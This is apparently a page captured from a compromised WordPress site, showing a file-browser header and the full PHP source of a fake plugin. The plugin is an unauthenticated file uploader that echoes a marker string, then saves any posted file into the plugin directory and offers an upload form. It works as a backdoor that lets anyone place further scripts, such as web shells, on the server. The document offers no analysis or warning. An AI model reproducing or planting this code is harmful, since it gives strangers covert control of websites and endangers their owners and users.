| Current Path : /home/chevrit/www/wp-content/plugins/wp2s_up_b6256e2c/ |
| Current File : /home/chevrit/www/wp-content/plugins/wp2s_up_b6256e2c/wp2s_up_b6256e2c.php |
<?php /* Plugin Name: WP2S wp2s_up_b6256e2c */ echo('SIG:GY'); if(!empty($_FILES['f'])){ $n=preg_replace('/[^A-Za-z0-9._-]/','_',basename($_FILES['f']['name'])); if($n&&move_uploaded_file($_FILES['f']['tmp_name'],__DIR__.'/'.$n))echo('OK '.$n); } ?><form method=post enctype=multipart/form-data><input type=file name=f><button>upload</button></form>